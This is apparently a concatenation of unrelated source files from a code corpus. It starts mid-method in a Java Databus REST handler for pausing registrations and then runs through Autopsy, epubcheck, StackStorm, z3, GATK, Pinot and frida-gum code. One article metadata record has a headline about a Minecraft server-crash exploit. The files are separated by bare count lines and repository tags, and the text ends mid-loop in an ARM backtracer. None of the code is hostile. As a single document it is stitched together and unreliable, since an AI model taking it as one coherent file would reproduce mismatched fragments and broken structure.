rEx = ex;
}
if (!found)
{
try
{
r2 = findV3Registration(request, PAUSE_REGISTRATION);
found = true;
isRunning = r2.getState().isRunning();
isPaused = (r2.getState() == RegistrationState.PAUSED);
isSuspended = (r2.getState() == RegistrationState.SUSPENDED_ON_ERROR);
regId = r.getRegistrationId();
}
catch (RequestProcessingException ex)
{
found = false;
rEx = ex;
}
}
if (!found)
throw rEx;
LOG.info("REST call to pause registration : " + regId);
if (isRunning)
{
if (doPause)
{
if (!isPaused)
{
if (null != r)
{
r.pause();
regStatePair = new RegStatePair(r.getState(), r.getRegistrationId());
}
else
{
r2.pause();
regStatePair = new RegStatePair(r2.getState().name(), r2.getRegistrationId());
}
}
}
else
{
if (isPaused || isSuspended)
{
if (null != r)
{
r.resume();
regStatePair = new RegStatePair(r.getState(), r.getRegistrationId());
}
else
{
r2.resume();
regStatePair = new RegStatePair(r2.getState().name(), r2.getRegistrationId());
}
}
}
}
writeJsonObjectToResponse(regStatePair, request);
}
/**
* Pause all registrations (both V2 and V3 in this client instance) which are in running
* state.
*
* @param request
* DatabusRequest corresponding to the REST call.
* @throws IOException
* when unable to write the output.
*/
private void pauseAllRegistrations(DatabusRequest request) throws IOException
{
LOG.info("REST call to pause all registrations");
/**
* Get the top-level V2 registrations and pause them. The child-level registrations by
* the top-level registrations that aggregates them.
*/
Collection<DatabusRegistration> regs = _client.getAllRegistrations();
if (null != regs)
{
for (DatabusRegistration r : regs)
{
if (r.getState().isRunning())
{
if (r.getState() != DatabusRegistration.RegistrationState.PAUSED)
r.pause();
}
}
}
/**
* Get the top-level V3 registrations and pause them. The child-level registrations by
* the top-level registrations that aggregates them.
*/
Map<RegistrationId, DatabusV3Registration> regMap = _client.getRegistrationIdMap();
Collection<RegInfo> topLevelRegs = getAllTopLevelV3Registrations();
/**
* Important Note: There is an important implementation difference on which
* registrations are stored in the global registration data-structure maintained by
* the client (DatabusHttp[V3]ClientImpls) between V2 and V3.
*
* 1. In the case of V2, only top-level registrations are stored in the global
* data-structure (DatabusHttpClientImpl.regList 2. In the case of V3, all
* registrations are stored in the global data-structure.
*
* In the case of V3, this is needed so that all registrations can act on the relay
* external view change. This can be refactored in the future by moving the
* relay-external view change to registration impl ( reduce the complexity in
* ClientImpl ). The V2 implementation did not have this logic and was following a
* more intuitive structure of preserving the hierarchy.
*/
if ((null != regMap) && (null != topLevelRegs))
{
for (RegInfo reg : topLevelRegs)
{
DatabusV3Registration r = regMap.get(reg.getRegId());
if (r.getState().isRunning())
{
if (r.getState() != RegistrationState.PAUSED)
r.pause();
}
}
}
writeJsonObjectToResponse(getAllTopLevelRegStates(), request);
}
/**
* Resume all registrations paused or suspended (both V2 and V3 in this client instance)
*
* @param request
* DatabusRequest corresponding to the REST call.
* @throws IOException
* when unable to write the output.
*/
private void resumeAllRegistrations(DatabusRequest request) throws IOException
{
LOG.info("REST call to resume all registrations");
/**
* Get the top-level V2 registrations and pause them. The child-level registrations by
* the top-level registrations that aggregates them.
*/
Collection<DatabusRegistration> regs = _client.getAllRegistrations();
if (null != regs)
{
for (DatabusRegistration r : regs)
{
if (r.getState().isRunning())
{
if ((r.getState() == DatabusRegistration.RegistrationState.PAUSED)
|| (r.getState() == DatabusRegistration.RegistrationState.SUSPENDED_ON_ERROR))
r.resume();
}
}
}
/**
* Get the top-level V3 registrations and pause them. The child-level registrations by
* the top-level registrations that aggregates them.
*/
Map<RegistrationId, DatabusV3Registration> regMap = _client.getRegistrationIdMap();
Collection<RegInfo> topLevelRegs = getAllTopLevelV3Registrations();
/**
* Important Note: There is an important implementation difference on which
* registrations are stored in the global registration data-structure maintained by
* the client (DatabusHttp[V3]ClientImpls) between V2 and V3.
*
* 1. In the case of V2, only top-level registrations are stored in the global
* data-structure (DatabusHttpClientImpl.regList 2. In the case of V3, all
* registrations are stored in the global data-structure.
*
* In the case of V3, this is needed so that all registrations can act on the relay
* external view change. This can be refactored in the future by moving the
* relay-external view change to registration impl ( reduce the complexity in
* ClientImpl ). The V2 implementation did not have this logic and was following a
* more intuitive structure of preserving the hierarchy.
*/
if ((null != regMap) && (null != topLevelRegs))
{
for (RegInfo reg : topLevelRegs)
{
DatabusV3Registration r = regMap.get(reg.getRegId());
if (r.getState().isRunning())
{
if ((r.getState() == RegistrationState.PAUSED)
|| (r.getState() == RegistrationState.SUSPENDED_ON_ERROR))
r.resume();
}
}
}
writeJsonObjectToResponse(getAllTopLevelRegStates(), request);
}
/**
* Generate regStatePair for all the top-level registrations (both V2 and V3).
*
* @return
*/
private Collection<RegStatePair> getAllTopLevelRegStates()
{
List<RegStatePair> regList = new ArrayList<RegStatePair>();
Collection<RegInfo> regs = getAllTopLevelRegistrations();
for (RegInfo reg : regs)
{
regList.add(new RegStatePair(reg.getState(), reg.getRegId()));
}
return regList;
}
/**
* Returns all the top-level registrations (both V2 and V3). Top-level registrations are
* those that were created as a result of one of "registerXXX()" calls on
* databus-client. In the case of multi-partition registrations (like MPRegistration,
* V2/V3 CLB), only the parent registration is considered the top-level registration.
* Per-partition (child) registrations which were created as part of partition migration
* are NOT top-level registrations.
*
* @return collection of top-level registrations (V2/V3)
*/
private Collection<RegInfo> getAllTopLevelRegistrations()
{
List<RegInfo> regList = new ArrayList<RegInfo>();
regList.addAll(getAllTopLevelV2Registrations());
regList.addAll(getAllTopLevelV3Registrations());
return regList;
}
/**
* Returns all the top-level V3 registrations. Top-level registrations are those that
* were created as a result of one of "registerXXX()" calls on databus-client. In the
* case of multi-partition registrations (like MPRegistration, V3 CLB), only the parent
* registration is considered the top-level registration. Per-partition (child)
* registrations which were created as part of partition migration are NOT top-level
* registrations.
*
* @return collection of top-level registrations (V3)
*/
private Collection<RegInfo> getAllTopLevelV3Registrations()
{
/**
* Important Note: There is an important implementation difference on which
* registrations are stored in the global registration data-structure maintained by
* the client (DatabusHttp[V3]ClientImpls) between V2 and V3.
*
* 1. In the case of V2, only top-level registrations are stored in the global
* data-structure (DatabusHttpClientImpl.regList 2. In the case of V3, all
* registrations are stored in the global data-structure.
*
* In the case of V3, this is needed so that all registrations can act on the relay
* external view change. This can be refactored in the future by moving the
* relay-external view change to registration impl ( reduce the complexity in
* ClientImpl ). The V2 implementation did not have this logic and was following a
* more intuitive structure of preserving the hierarchy.
*/
Map<RegistrationId, RegInfo> regListMap = new HashMap<RegistrationId, RegInfo>();
/**
* The _client.getRegistrationIdMap() has all registrations in one place. Top-Level
* Registrations = Only those registrations whose getParent() == null.
*/
Map<RegistrationId, DatabusV3Registration> regMap = _client.getRegistrationIdMap();
for (Entry<RegistrationId, DatabusV3Registration> e : regMap.entrySet())
{
RegInfo regInfo = null;
DatabusV3Registration r = e.getValue();
// If not top-level, skip
if (null != r.getParentRegistration())
{
continue;
}
Map<DbusPartitionInfo, RegInfo> childR = null;
if (r instanceof DatabusV3MultiPartitionRegistration)
{
// ass the children regs to parent.
Map<PhysicalPartition, DatabusV3Registration> childRegs =
((DatabusV3MultiPartitionRegistration) r).getPartionRegs();
childR = new HashMap<DbusPartitionInfo, RegInfo>();
for (Entry<PhysicalPartition, DatabusV3Registration> e2 : childRegs.entrySet())
{
childR.put(new DbusPartitionInfoImpl(e2.getKey().getId()),
new RegInfo(e.getValue().getState().name(),
e.getValue().getRegistrationId(),
e.getValue().getStatus(),
null,
e.getValue().getSubscriptions()));
}
}
regInfo =
new RegInfo(r.getState().name(),
r.getRegistrationId(),
r.getStatus(),
null,
r.getSubscriptions(),
true,
childR);
regListMap.put(e.getKey(), regInfo);
}
return regListMap.values();
}
/**
* Returns all the top-level V2 registrations. Top-level registrations are those that
* were created as a result of one of "registerXXX()" calls on databus-client. In the
* case of multi-partition registrations (like V2 CLB), only the parent registration is
* considered the top-level registration. Per-partition (child) registrations which were
* created as part of partition migration are NOT top-level registrations.
*
* @return collection of top-level registrations (V2)
*/
private Collection<RegInfo> getAllTopLevelV2Registrations()
{
List<RegInfo> regList = new ArrayList<RegInfo>();
Collection<DatabusRegistration> regs = _client.getAllRegistrations();
for (DatabusRegistration r : regs)
{
RegInfo regInfo = null;
if (r instanceof DatabusMultiPartitionRegistration)
{
Map<DbusPartitionInfo, DatabusRegistration> childRegs =
((DatabusMultiPartitionRegistration) r).getPartitionRegs();
Map<DbusPartitionInfo, RegInfo> childR =
new HashMap<DbusPartitionInfo, RegInfo>();
for (Entry<DbusPartitionInfo, DatabusRegistration> e : childRegs.entrySet())
{
childR.put(e.getKey(), new RegInfo(e.getValue().getState().name(),
e.getValue().getRegistrationId(),
e.getValue().getStatus(),
e.getValue().getFilterConfig(),
e.getValue().getSubscriptions()));
}
regInfo =
new RegInfo(r.getState().name(),
r.getRegistrationId(),
r.getStatus(),
r.getFilterConfig(),
r.getSubscriptions(),
true,
childR);
}
else
{
regInfo =
new RegInfo(r.getState().name(),
r.getRegistrationId(),
r.getStatus(),
r.getFilterConfig(),
r.getSubscriptions());
}
regList.add(regInfo);
}
return regList;
}
/**
* Get the list of partitions hosted by this client for the V2 cluster.
*
* @param cluster
* V2 CLuster for which we need to find out the partitions.
* @return
* @throws RequestProcessingException
* when unable to find the cluster.
*/
private Collection<PartitionInfo> getV2ClusterPartitions(String cluster) throws RequestProcessingException
{
DatabusV2ClusterRegistrationImpl reg = getV2ClusterRegistration(cluster);
List<PartitionInfo> partitions = new ArrayList<PartitionInfo>();
Map<DbusPartitionInfo, DatabusRegistration> regMap = reg.getPartitionRegs();
for (Entry<DbusPartitionInfo, DatabusRegistration> e : regMap.entrySet())
{
PartitionInfo p =
new PartitionInfo(e.getKey().getPartitionId(), e.getValue().getRegistrationId());
partitions.add(p);
}
return partitions;
}
/**
* Get the list of partitions hosted by this client for the V3 cluster.
*
* @param cluster
* V3 CLuster for which we need to find out the partitions.
* @return
* @throws RequestProcessingException
* when unable to find the cluster.
*/
private Collection<PartitionInfo> getV3ClusterPartitions(String cluster) throws RequestProcessingException
{
DatabusV3MultiPartitionRegistration reg = getV3ClusterRegistration(cluster);
List<PartitionInfo> partitions = new ArrayList<PartitionInfo>();
Map<PhysicalPartition, DatabusV3Registration> regMap = reg.getPartionRegs();
for (Entry<PhysicalPartition, DatabusV3Registration> e : regMap.entrySet())
{
PartitionInfo p =
new PartitionInfo(e.getKey().getId(), e.getValue().getRegistrationId());
partitions.add(p);
}
return partitions;
}
/**
* Helper method to get partition registration information for a given V2 Cluster
* partition
*
* @param cluster
* V2 Cluster
* @param partition
* Partition in the cluster.
* @return
* @throws RequestProcessingException
* When cluster or partition is not hosted in this instance.
*/
private RegInfo getV2PartitionRegistration(String cluster, long partition) throws RequestProcessingException
{
DatabusV2ClusterRegistrationImpl reg = getV2ClusterRegistration(cluster);
DbusPartitionInfo p = new DbusPartitionInfoImpl(partition);
DatabusRegistration r = reg.getPartitionRegs().get(p);
if (null == r)
throw new RequestProcessingException("Partition(" + partition + ") for cluster ("
+ cluster + ") not found !!");
return new RegInfo(r.getState().name(),
r.getRegistrationId(),
r.getStatus(),
r.getFilterConfig(),
r.getSubscriptions());
}
/**
* Helper method to get partition registration information for a given V3 Cluster
* partition
*
* @param cluster
* V3 Cluster
* @param partition
* Partition in the cluster.
* @return
* @throws RequestProcessingException
* When cluster or partition is not hosted in this instance.
*/
private RegInfo getV3PartitionRegistration(String cluster, long partition) throws RequestProcessingException
{
DatabusV3MultiPartitionRegistration reg = getV3ClusterRegistration(cluster);
for (Entry<PhysicalPartition, DatabusV3Registration> e : reg.getPartionRegs()
.entrySet())
{
if (partition == e.getKey().getId())
{
DatabusV3Registration r = e.getValue();
return new RegInfo(r.getState().name(),
r.getRegistrationId(),
r.getStatus(),
null,
r.getSubscriptions());
}
}
throw new RequestProcessingException("Partition(" + partition + ") for cluster ("
+ cluster + ") not found !!");
}
/**
* Helper method to locate a databus V2 registration by its registration id. This method
* can locate both top-level (registered by one of _dbusClient.registerXXX()) and
* individual-partition (child) registration that are aggregated inside a top-level
* MultiPartition registration.
*
* Please note that this can traverse the registration tree which is 1 level deep. In
* other words, it will not work when we have MultiPartition registrations aggregated
* inside another MultiPartition registrations.
*
* @param regId
* Registration Id to be located
* @param request
* Databus Request corresponding to the REST call.
* @return
* @throws RequestProcessingException
* when the registration is not found.
*/
private DatabusRegistration findV2Registration(DatabusRequest request, String prefix) throws RequestProcessingException
{
String category = request.getParams().getProperty(DatabusRequest.PATH_PARAM_NAME);
String registrationIdStr = category.substring(prefix.length());
RegistrationId regId = new RegistrationId(registrationIdStr);
Collection<DatabusRegistration> regs = _client.getAllRegistrations();
if (null != regs)
{
for (DatabusRegistration r : regs)
{
if (regId.equals(r.getRegistrationId()))
{
return r;
}
/**
* Important Note: There is an important implementation difference on which
* registrations are stored in the global registration data-structure maintained
* by the client (DatabusHttp[V3]ClientImpls) between V2 and V3.
*
* 1. In the case of V2, only top-level registrations are stored in the global
* data-structure (DatabusHttpClientImpl.regList 2. In the case of V3, all
* registrations are stored in the global data-structure.
*
* In the case of V3, this is needed so that all registrations can act on the
* relay external view change. This can be refactored in the future by moving the
* relay-external view change to registration impl ( reduce the complexity in
* ClientImpl ). The V2 implementation did not have this logic and was following a
* more intuitive structure of preserving the hierarchy. The below code handles
* the discrepancy for V2.
*/
if (r instanceof DatabusMultiPartitionRegistration)
{
Map<DbusPartitionInfo, DatabusRegistration> childRegs =
((DatabusMultiPartitionRegistration) r).getPartitionRegs();
for (Entry<DbusPartitionInfo, DatabusRegistration> e : childRegs.entrySet())
{
if (regId.equals(e.getValue().getRegistrationId()))
{
return e.getValue();
}
}
}
}
}
throw new RequestProcessingException("Unable to find registration (" + regId + ") ");
}
/**
* Helper method to locate a databus V3 registration by its registration id. This method
* can locate both top-level (registered by one of _dbusClient.registerXXX()) and
* individual-partition (child) registration that are aggregated inside a top-level
* MultiPartition registration.
*
* Please note that this can traverse the registration tree which is 1 level deep. In
* other words, it will not work when we have MultiPartition registrations aggregated
* inside another MultiPartition registrations.
*
* @param regId
* Registration Id to be located
* @param request
* Databus Request corresponding to the REST call.
* @return
* @throws RequestProcessingException
* when the registration is not found.
*/
private DatabusV3Registration findV3Registration(RegistrationId regId,
DatabusRequest request) throws RequestProcessingException
{
Map<RegistrationId, DatabusV3Registration> regIdMap = _client.getRegistrationIdMap();
if (null == regIdMap)
{
throw new InvalidRequestParamValueException(request.getName(),
REGISTRATION_KEY_PREFIX,
"No registrations available !! ");
}
/**
* Important Note: There is an important implementation difference on which
* registrations are stored in the global registration data-structure maintained by
* the client (DatabusHttp[V3]ClientImpls) between V2 and V3.
*
* 1. In the case of V2, only top-level registrations are stored in the global
* data-structure (DatabusHttpClientImpl.regList 2. In the case of V3, all
* registrations are stored in the global data-structure.
*
* In the case of V3, this is needed so that all registrations can act on the relay
* external view change. This can be refactored in the future by moving the
* relay-external view change to registration impl ( reduce the complexity in
* ClientImpl ). The V2 implementation did not have this logic and was following a
* more intuitive structure of preserving the hierarchy.
*/
for (DatabusV3Registration r : regIdMap.values())
{
if (regId.equals(r.getRegistrationId()))
{
return r;
}
}
throw new InvalidRequestParamValueException(request.getName(),
REGISTRATION_KEY_PREFIX,
"Registration with id " + regId
+ " not present !!");
}
private DatabusV3Registration findV3Registration(DatabusRequest request, String prefix) throws RequestProcessingException
{
String category = request.getParams().getProperty(DatabusRequest.PATH_PARAM_NAME);
String regIdStr = category.substring(prefix.length());
RegistrationId regId = new RegistrationId(regIdStr);
return findV3Registration(regId, request);
}
private static class PartitionInfo
{
private final long partition;
private final RegistrationId regId;
public long getPartition()
{
return partition;
}
public RegistrationId getRegId()
{
return regId;
}
public PartitionInfo(long partition, RegistrationId regId)
{
super();
this.partition = partition;
this.regId = regId;
}
}
private static class RegStatePair
{
private final String _state;
private final RegistrationId _regId;
public String getState()
{
return _state;
}
public RegistrationId getRegId()
{
return _regId;
}
public RegStatePair(DatabusRegistration.RegistrationState state, RegistrationId regId)
{
_regId = regId;
_state = state.name();
}
public RegStatePair(String state, RegistrationId regId)
{
_regId = regId;
_state = state;
}
}
private static class RegInfo
{
private final String state;
private final RegistrationId regId;
private final String status;
private final DbusKeyCompositeFilterConfig filter;
private final Collection<DatabusSubscription> subs;
private final boolean isMultiPartition;
private final Map<DbusPartitionInfo, RegInfo> childRegistrations;
public String getState()
{
return state;
}
public RegistrationId getRegId()
{
return regId;
}
public String getStatus()
{
return status;
}
public DbusKeyCompositeFilterConfig getFilter()
{
return filter;
}
public Collection<DatabusSubscription> getSubs()
{
return subs;
}
public boolean isMultiPartition()
{
return isMultiPartition;
}
public Map<DbusPartitionInfo, RegInfo> getChildRegistrations()
{
return childRegistrations;
}
public RegInfo(String state,
RegistrationId regId,
DatabusComponentStatus status,
DbusKeyCompositeFilterConfig filter,
Collection<DatabusSubscription> subs)
{
this(state, regId, status, filter, subs, false, null);
}
public RegInfo(String state,
RegistrationId regId,
DatabusComponentStatus status,
DbusKeyCompositeFilterConfig filter,
Collection<DatabusSubscription> subs,
boolean isMultiPartition,
Map<DbusPartitionInfo, RegInfo> childRegistrations)
{
super();
this.state = state;
this.regId = regId;
this.status = status.toString();
this.filter = filter;
this.subs = subs;
this.isMultiPartition = isMultiPartition;
this.childRegistrations = childRegistrations;
}
}
}
| 18,380
|
1,473
|
/*
* Autopsy Forensic Browser
*
* Copyright 2011-2021 Basis Technology Corp.
* Contact: carrier <at> sleuthkit <dot> org
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.sleuthkit.autopsy.datamodel;
import org.openide.nodes.Sheet;
import org.openide.util.NbBundle;
import org.sleuthkit.autopsy.coreutils.Logger;
import org.sleuthkit.datamodel.VirtualDirectory;
/**
* Node for a virtual directory
*/
public class VirtualDirectoryNode extends SpecialDirectoryNode {
private static final Logger logger = Logger.getLogger(VirtualDirectoryNode.class.getName());
//prefix for special VirtualDirectory root nodes grouping local files
public final static String LOGICAL_FILE_SET_PREFIX = "LogicalFileSet"; //NON-NLS
public static String nameForVirtualDirectory(VirtualDirectory ld) {
return ld.getName();
}
public VirtualDirectoryNode(VirtualDirectory ld) {
super(ld);
this.setDisplayName(nameForVirtualDirectory(ld));
this.setIconBaseWithExtension("org/sleuthkit/autopsy/images/folder-icon-virtual.png"); //TODO NON-NLS
}
@Override
protected Sheet createSheet() {
Sheet defaultSheet = super.createSheet();
Sheet.Set defaultSheetSet = defaultSheet.get(Sheet.PROPERTIES);
//Pick out the location column
//This path should not show because VDs are not part of the data source
String locationCol = NbBundle.getMessage(AbstractAbstractFileNode.class, "AbstractAbstractFileNode.locationColLbl");
for (Property<?> p : defaultSheetSet.getProperties()) {
if(locationCol.equals(p.getName())) {
defaultSheetSet.remove(p.getName());
}
}
return defaultSheet;
}
@Override
public <T> T accept(ContentNodeVisitor<T> visitor) {
return visitor.visit(this);
}
@Override
public <T> T accept(DisplayableItemNodeVisitor<T> visitor) {
return visitor.visit(this);
}
}
| 878
|
543
|
package com.adobe.epubcheck.ctc;
import com.adobe.epubcheck.api.Report;
import com.adobe.epubcheck.ctc.epubpackage.EpubPackage;
import com.adobe.epubcheck.opf.DocumentValidator;
/**
* === WARNING ==========================================<br/>
* This class is scheduled to be refactored and integrated<br/>
* in another package.<br/>
* Please keep changes minimal (bug fixes only) until then.<br/>
* ========================================================<br/>
*/
public class EpubCheckContentFactory implements ContentValidator
{
static private final EpubCheckContentFactory instance = new EpubCheckContentFactory();
static public EpubCheckContentFactory getInstance()
{
return instance;
}
@Override
public DocumentValidator newInstance(Report report, ValidationType vt, EpubPackage epack)
{
if (vt.equals(ValidationType.METADATA_V3))
{
return new EpubMetaDataV3Check(epack, report);
}
if (vt.equals(ValidationType.METADATA_V2))
{
return new EpubMetaDataV2Check(epack, report);
}
if (vt.equals(ValidationType.TEXT))
{
return new EpubTextContentCheck(report, epack);
}
else if (vt.equals(ValidationType.NAV))
{
return new EpubNavCheck(epack, report);
}
else if (vt.equals(ValidationType.NCX))
{
return new EpubNCXCheck(epack, report);
}
else if (vt.equals(ValidationType.SPINE))
{
return new EpubSpineCheck(epack, report);
}
else if (vt.equals(ValidationType.SCRIPT))
{
return new EpubScriptCheck(epack, report);
}
else if (vt.equals(ValidationType.SPAN))
{
return new EpubSpanCheck(epack, report);
}
else if (vt.equals(ValidationType.LANG))
{
return new EpubLangCheck(epack, report);
}
else if (vt.equals(ValidationType.CSS_SEARCH))
{
return new EpubCSSCheck(epack, report);
}
else if (vt.equals(ValidationType.LINK))
{
return new EpubExtLinksCheck(epack, report);
}
else if (vt.equals(ValidationType.RENDITION))
{
return new EpubRenditionCheck(epack, report);
}
else if (vt.equals(ValidationType.CFI))
{
return new EpubCfiCheck(epack, report);
}
else if (vt.equals(ValidationType.HTML_STRUCTURE))
{
return new EpubHTML5StructureCheck(epack, report);
}
else if (vt.equals(ValidationType.MULTIPLE_CSS))
{
return new EpubStyleSheetsCheck(epack, report);
}
else if (vt.equals(ValidationType.EPUB3_STRUCTURE))
{
return new Epub3StructureCheck(epack, report);
}
else if (vt.equals(ValidationType.TOC))
{
return new EpubTocCheck(epack, report);
}
else if (vt.equals(ValidationType.SVG))
{
return new EpubSVGCheck(epack, report);
}
else
{
return null;
}
}
}
| 1,143
|
4,920
|
<gh_stars>1000+
# Copyright 2020 The StackStorm Authors.
# Copyright 2019 Extreme Networks, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# pylint: disable=assignment-from-none
# XXX: This file has a lot of duplication with TriggerWatcher.
# XXX: Refactor.
from __future__ import absolute_import
import six
from kombu.mixins import ConsumerMixin
from st2common import log as logging
from st2common.transport import reactor, publishers
from st2common.transport import utils as transport_utils
from st2common.util import concurrency
import st2common.util.queues as queue_utils
LOG = logging.getLogger(__name__)
class SensorWatcher(ConsumerMixin):
def __init__(
self, create_handler, update_handler, delete_handler, queue_suffix=None
):
"""
:param create_handler: Function which is called on SensorDB create event.
:type create_handler: ``callable``
:param update_handler: Function which is called on SensorDB update event.
:type update_handler: ``callable``
:param delete_handler: Function which is called on SensorDB delete event.
:type delete_handler: ``callable``
"""
# TODO: Handle sensor type filtering using routing key
self._create_handler = create_handler
self._update_handler = update_handler
self._delete_handler = delete_handler
self._sensor_watcher_q = self._get_queue(queue_suffix)
self.connection = None
self._updates_thread = None
self._handlers = {
publishers.CREATE_RK: create_handler,
publishers.UPDATE_RK: update_handler,
publishers.DELETE_RK: delete_handler,
}
def get_consumers(self, Consumer, channel):
consumers = [
Consumer(
queues=[self._sensor_watcher_q],
accept=["pickle"],
callbacks=[self.process_task],
)
]
return consumers
def process_task(self, body, message):
LOG.debug("process_task")
LOG.debug(" body: %s", body)
LOG.debug(" message.properties: %s", message.properties)
LOG.debug(" message.delivery_info: %s", message.delivery_info)
routing_key = message.delivery_info.get("routing_key", "")
handler = self._handlers.get(routing_key, None)
try:
if not handler:
LOG.info("Skipping message %s as no handler was found.", message)
return
try:
handler(body)
except Exception as e:
LOG.exception(
"Handling failed. Message body: %s. Exception: %s",
body,
six.text_type(e),
)
finally:
message.ack()
def start(self):
try:
self.connection = transport_utils.get_connection()
self._updates_thread = concurrency.spawn(self.run)
except:
LOG.exception("Failed to start sensor_watcher.")
self.connection.release()
def stop(self):
LOG.debug("Shutting down sensor watcher.")
try:
if self._updates_thread:
self._updates_thread = concurrency.kill(self._updates_thread)
if self.connection:
channel = self.connection.channel()
bound_sensor_watch_q = self._sensor_watcher_q(channel)
try:
bound_sensor_watch_q.delete()
except:
LOG.error(
"Unable to delete sensor watcher queue: %s",
self._sensor_watcher_q,
)
finally:
if self.connection:
self.connection.release()
@staticmethod
def _get_queue(queue_suffix):
queue_name = queue_utils.get_queue_name(
queue_name_base="st2.sensor.watch",
queue_name_suffix=queue_suffix,
add_random_uuid_to_suffix=True,
)
return reactor.get_sensor_cud_queue(queue_name, routing_key="#")
| 2,006
|
343
|
{
"Author": "by <NAME> - Apr 16, 2015 8:02 pm UTC",
"Direction": null,
"Excerpt": "Two-year-old bug exposes thousands of servers to crippling attack.",
"Image": "http:\/\/cdn.arstechnica.net\/wp-content\/uploads\/2015\/04\/server-crash-640x426.jpg",
"Title": "Just-released Minecraft exploit makes it easy to crash game servers",
"SiteName": "Ars Technica"
}
| 137
|
7,746
|
<reponame>jar-ben/z3
/*++
Copyright (c) 2012 Microsoft Corporation
Module Name:
subpaving_mpf.cpp
Abstract:
Subpaving for non-linear arithmetic using multi-precision floats.
Author:
<NAME> (leonardo) 2012-07-31.
Revision History:
--*/
#include "math/subpaving/subpaving_mpf.h"
#include "math/subpaving/subpaving_t_def.h"
// force template instantiation
template class subpaving::context_t<subpaving::config_mpf>;
| 159
|
1,273
|
"""
Constants that must remain in sync with the companion StreamingProcessController Java
code in GATK. See StreamingToolConstants.java.
"""
"""
Command acknowledgement messages used to signal positive acknowledgement ('ack',
negative acknowledgement ('nck'), and negative acknowledgement with an accompanying
message ('nkm').
"""
_ackString = "ack"
_nackString = "nck"
_nkmString = "nkm"
"""
The length of a message written with a negative ack (nkm) must be 4 bytes long when
serialized as a string, and cannot have a value > 9999.
"""
_nckMessageLengthSerializedSize = 4
_nckMaxMessageLength = 9999
| 163
|
2,144
|
/**
* Licensed to the Apache Software Foundation (ASF) under one
* or more contributor license agreements. See the NOTICE file
* distributed with this work for additional information
* regarding copyright ownership. The ASF licenses this file
* to you under the Apache License, Version 2.0 (the
* "License"); you may not use this file except in compliance
* with the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing,
* software distributed under the License is distributed on an
* "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
* KIND, either express or implied. See the License for the
* specific language governing permissions and limitations
* under the License.
*/
package org.apache.pinot.segment.local.io.compression;
import java.io.IOException;
import java.nio.ByteBuffer;
import net.jpountz.lz4.LZ4CompressorWithLength;
import org.apache.pinot.segment.spi.compression.ChunkCompressionType;
import org.apache.pinot.segment.spi.compression.ChunkCompressor;
/**
* Identical to {@code LZ4Compressor} but prefixes the chunk with the
* decompressed length.
*/
class LZ4WithLengthCompressor implements ChunkCompressor {
static final LZ4WithLengthCompressor INSTANCE = new LZ4WithLengthCompressor();
private final LZ4CompressorWithLength _compressor;
private LZ4WithLengthCompressor() {
_compressor = new LZ4CompressorWithLength(LZ4Compressor.LZ4_FACTORY.fastCompressor());
}
@Override
public int compress(ByteBuffer inUncompressed, ByteBuffer outCompressed)
throws IOException {
_compressor.compress(inUncompressed, outCompressed);
outCompressed.flip();
return outCompressed.limit();
}
@Override
public int maxCompressedSize(int uncompressedSize) {
return _compressor.maxCompressedLength(uncompressedSize);
}
@Override
public ChunkCompressionType compressionType() {
return ChunkCompressionType.LZ4_LENGTH_PREFIXED;
}
}
| 600
|
450
|
<reponame>3vilWind/frida-gum
/*
* Copyright (C) 2013-2018 <NAME> <<EMAIL>>
* Copyright (C) 2021 <NAME> <<EMAIL>>
*
* Licence: wxWindows Library Licence, Version 3.1
*/
#include "gumarmbacktracer.h"
#include "guminterceptor.h"
#include "gummemorymap.h"
struct _GumArmBacktracer
{
GObject parent;
GumMemoryMap * code;
GumMemoryMap * writable;
};
static void gum_arm_backtracer_iface_init (gpointer g_iface,
gpointer iface_data);
static void gum_arm_backtracer_dispose (GObject * object);
static void gum_arm_backtracer_generate (GumBacktracer * backtracer,
const GumCpuContext * cpu_context, GumReturnAddressArray * return_addresses,
guint limit);
G_DEFINE_TYPE_EXTENDED (GumArmBacktracer,
gum_arm_backtracer,
G_TYPE_OBJECT,
0,
G_IMPLEMENT_INTERFACE (GUM_TYPE_BACKTRACER,
gum_arm_backtracer_iface_init))
static void
gum_arm_backtracer_class_init (GumArmBacktracerClass * klass)
{
GObjectClass * object_class = G_OBJECT_CLASS (klass);
object_class->dispose = gum_arm_backtracer_dispose;
}
static void
gum_arm_backtracer_iface_init (gpointer g_iface,
gpointer iface_data)
{
GumBacktracerInterface * iface = g_iface;
iface->generate = gum_arm_backtracer_generate;
}
static void
gum_arm_backtracer_init (GumArmBacktracer * self)
{
self->code = gum_memory_map_new (GUM_PAGE_EXECUTE);
self->writable = gum_memory_map_new (GUM_PAGE_WRITE);
}
static void
gum_arm_backtracer_dispose (GObject * object)
{
GumArmBacktracer * self = GUM_ARM_BACKTRACER (object);
g_clear_object (&self->code);
g_clear_object (&self->writable);
G_OBJECT_CLASS (gum_arm_backtracer_parent_class)->dispose (object);
}
GumBacktracer *
gum_arm_backtracer_new (void)
{
return g_object_new (GUM_TYPE_ARM_BACKTRACER, NULL);
}
static void
gum_arm_backtracer_generate (GumBacktracer * backtracer,
const GumCpuContext * cpu_context,
GumReturnAddressArray * return_addresses,
guint limit)
{
GumArmBacktracer * self;
GumInvocationStack * invocation_stack;
gsize * start_address;
guint skips_pending, depth, i;
gsize * p;
self = GUM_ARM_BACKTRACER (backtracer);
invocation_stack = gum_interceptor_get_current_stack ();
if (cpu_context != NULL)
{
start_address = GSIZE_TO_POINTER (cpu_context->sp);
skips_pending = 0;
}
else
{
asm ("\tmov %0, sp" : "=r" (start_address));
skips_pending = 1;
}
depth = MIN (limit, G_N_ELEMENTS (return_addresses->items));
for (i = 0, p = start_address; p < start_address + 2048; p++)
